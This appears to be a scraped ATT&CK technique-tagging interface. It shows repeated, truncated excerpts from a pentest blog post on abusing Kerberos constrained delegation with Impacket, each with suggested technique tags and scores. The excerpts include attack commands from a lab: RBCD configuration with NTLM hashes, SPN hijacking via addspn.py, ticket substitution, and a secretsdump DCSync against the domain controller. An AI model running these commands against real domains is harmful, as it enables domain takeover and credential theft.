“dcsync against dc01 as administrator impacket - secretsdump - k dc01. secure. local 3. live machine spn hijacking with genericwrite spn hijacking is an edge - case technique where, if the conditions line up, an attacker with permissions to modify a target ’ s spns can effectively…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.003Kerberoasting
77%
“local ). 1. find machine - based constrained delegation with protocol transition ( pc01 $ to host / dc01. secure. local ) impacket - finddelegation ' secure. local / kcduser ' : ' password2 @ ' - dc - ip 10. 0. 1. 200 2. using pc01 $ ’ s ntlm hash, we can obtain a service ticket …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1550.003Pass the Ticket
70%
“an elevated user. - pass that forwardable ticket ( with an additional s4u2proxy ) to the service the compromised resource is allowed to delegate to. 1. add a user spn and machine account, reflective rbcd assume we ’ ve compromised the user kcduser with the password password2 @, w…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1550.003Pass the Ticket
69%
“compromised host is allowed to delegate to. a quick aside, the reason why maq comes in handy is because computer accounts always have spns tied to them by default. however, if maq is disabled, the same can be done if an attacker controls a user with an spn or has the permission t…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1550.003Pass the Ticket
64%
“' - - spn ' host / pc01. secure. local ' 10. 0. 1. 200 11. verify all spns are restored on dc01 $ and pc01 $ python3 addspn. py - u secure. localdacluser - p ' password3 # ' - t ' pc01 $ ' 10. 0. 1. 200 - q python3 addspn. py - u secure. localdacluser - p ' password3 # ' - t ' dc…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558Steal or Forge Kerberos Tickets
58%
“9f44 - e1453be7af5a - https : / / shenaniganslabs. io / 2019 / 01 / 28 / wagging - the - dog. html # a - forwardable - result - https : / / www. thehacker. recipes / ad / movement / kerberos / delegations / constrained - https : / / sqlmastersconsulting. com. au / sql - server - …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558Steal or Forge Kerberos Tickets
52%
“compromised host is allowed to delegate to. a quick aside, the reason why maq comes in handy is because computer accounts always have spns tied to them by default. however, if maq is disabled, the same can be done if an attacker controls a user with an spn or has the permission t…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558Steal or Forge Kerberos Tickets
51%
“abusing delegation with impacket ( part 2 ) : constrained delegation abusing delegation with impacket ( part 2 ) : constrained delegation hunter recently graduated with his master ’ s degree in cyber defense and has over two years of experience in penetration testing. his favorit…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.001Golden Ticket
47%
“3. configure pc01 $ to trust machine $ for delegation impacket - rbcd - delegate - from ' machine $ ' - delegate - to ' pc01 $ ' - dc - ip 10. 0. 1. 200 - action ' write ' - hashes ' aad3b435b51404eeaad3b435b51404ee : 8d67f5a634a447bee65785be5c49b2a4 ' ' secure. local / pc01 $ ' …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1550.003Pass the Ticket
47%
“##404eeaad3b435b51404ee : 16f2bd968f2885a410873b4efa104527 ' ' secure. local / administrator ' conclusion while constrained delegation offers improvements in limiting risk compared to its dangerous unconstrained counterpart, if a resource configured with constrained delegation is…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.001Golden Ticket
46%
“host / pc01. secure. local spn to dc01 $ python3 addspn. py - u secure. localdacluser - p ' password3 # ' - t ' dc01 $ ' - - spn ' host / pc01. secure. local ' 10. 0. 1. 200 5. using pc02 $ ’ s ntlm hash, obtain a service ticket as the domain administrator to host / pc01. secure.…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.003Kerberoasting
43%
“u secure. localkcduser - p ' password2 @ ' - s host / kcd. secure. local - - target - type samname 10. 0. 1. 200 - r 2. s4u2self and s4u2proxy with machine ntlm hash assume we ’ ve compromised the machine pc01 $ with the ntlm hash aad3b435b51404eeaad3b435b51404ee : 8d67f5a634a447…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.003Kerberoasting
41%
“##rarily write spns among other things. this means, with the permissions we have, we can migrate pc01 ’ s host / pc01. secure. local spn to dc01, essentially making dc01 the target for delegation. then, if we perform s4u2self and s4u2proxy, we can obtain a service ticket as an el…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558Steal or Forge Kerberos Tickets
40%
“3. configure pc01 $ to trust machine $ for delegation impacket - rbcd - delegate - from ' machine $ ' - delegate - to ' pc01 $ ' - dc - ip 10. 0. 1. 200 - action ' write ' - hashes ' aad3b435b51404eeaad3b435b51404ee : 8d67f5a634a447bee65785be5c49b2a4 ' ' secure. local / pc01 $ ' …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.001Golden Ticket
39%
“and s4u2proxy. there are two types of constrained delegation – with and without protocol transition. the key difference is how the impersonation is done. - constrained with protocol transition : uses s4u2self to impersonate users and s4u2proxy to generate a service ticket to the …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1550.003Pass the Ticket
39%
“s4u2self and s4u2proxy with username and password assume we ’ ve compromised the user kcduser with the password password2 @, which is allowed to delegate to host / dc01. secure. local, being the domain controller. to escalate in the domain, since protocol transition is enabled, w…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.001Golden Ticket
39%
“' - - spn ' host / pc01. secure. local ' 10. 0. 1. 200 11. verify all spns are restored on dc01 $ and pc01 $ python3 addspn. py - u secure. localdacluser - p ' password3 # ' - t ' pc01 $ ' 10. 0. 1. 200 - q python3 addspn. py - u secure. localdacluser - p ' password3 # ' - t ' dc…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1550.003Pass the Ticket
38%
“to delegate to host / dc01. secure. local, being the domain controller. to escalate in the domain, since protocol transition is disabled, we can obtain a forwardable service ticket through reflective resource based constrained delegation ( maq + rbcd ). 1. find machine - based co…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1550.003Pass the Ticket
37%
“3. configure pc01 $ to trust machine $ for delegation impacket - rbcd - delegate - from ' machine $ ' - delegate - to ' pc01 $ ' - dc - ip 10. 0. 1. 200 - action ' write ' - hashes ' aad3b435b51404eeaad3b435b51404ee : 8d67f5a634a447bee65785be5c49b2a4 ' ' secure. local / pc01 $ ' …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1550.003Pass the Ticket
35%
“the question : how can we use s4u2proxy to generate a forwardable service ticket? reflective resource - based constrained delegation any user or machine in a domain, by default, can configure resource - based constrained delegation ( rbcd ) on themselves. this is essentially trad…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.001Golden Ticket
35%
“an elevated user. - pass that forwardable ticket ( with an additional s4u2proxy ) to the service the compromised resource is allowed to delegate to. 1. add a user spn and machine account, reflective rbcd assume we ’ ve compromised the user kcduser with the password password2 @, w…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.001Golden Ticket
35%
“the question : how can we use s4u2proxy to generate a forwardable service ticket? reflective resource - based constrained delegation any user or machine in a domain, by default, can configure resource - based constrained delegation ( rbcd ) on themselves. this is essentially trad…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.001Golden Ticket
35%
“s4u2self and s4u2proxy with username and password assume we ’ ve compromised the user kcduser with the password password2 @, which is allowed to delegate to host / dc01. secure. local, being the domain controller. to escalate in the domain, since protocol transition is enabled, w…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558Steal or Forge Kerberos Tickets
34%
“to delegate to host / dc01. secure. local, being the domain controller. to escalate in the domain, since protocol transition is disabled, we can obtain a forwardable service ticket through reflective resource based constrained delegation ( maq + rbcd ). 1. find machine - based co…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558Steal or Forge Kerberos Tickets
34%
“the question : how can we use s4u2proxy to generate a forwardable service ticket? reflective resource - based constrained delegation any user or machine in a domain, by default, can configure resource - based constrained delegation ( rbcd ) on themselves. this is essentially trad…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1550.003Pass the Ticket
33%
“##rarily write spns among other things. this means, with the permissions we have, we can migrate pc01 ’ s host / pc01. secure. local spn to dc01, essentially making dc01 the target for delegation. then, if we perform s4u2self and s4u2proxy, we can obtain a service ticket as an el…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1550.003Pass the Ticket
32%
“and s4u2proxy. there are two types of constrained delegation – with and without protocol transition. the key difference is how the impersonation is done. - constrained with protocol transition : uses s4u2self to impersonate users and s4u2proxy to generate a service ticket to the …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.003Kerberoasting
32%
“to delegate to host / dc01. secure. local, being the domain controller. to escalate in the domain, since protocol transition is disabled, we can obtain a forwardable service ticket through reflective resource based constrained delegation ( maq + rbcd ). 1. find machine - based co…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1558.003Kerberoasting
31%
“to host / dc01. secure. local python3 tgssub. py - in administrator @ [ email protected ] - out dc01 - ticket. ccache - altservice ' host / dc01. secure. local ' 7. export the ticket into memory export krb5ccname = dc01 - ticket. ccache 8. perform a dcsync against dc01 as adminis…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
This is the second in a three-part series of blog posts discussing how to abuse Kerberos delegation! If you haven't already, feel free to read the first blog post, as it discusses the Kerberos authentication process and how delegation plays an important role in solving the double-hop problem.
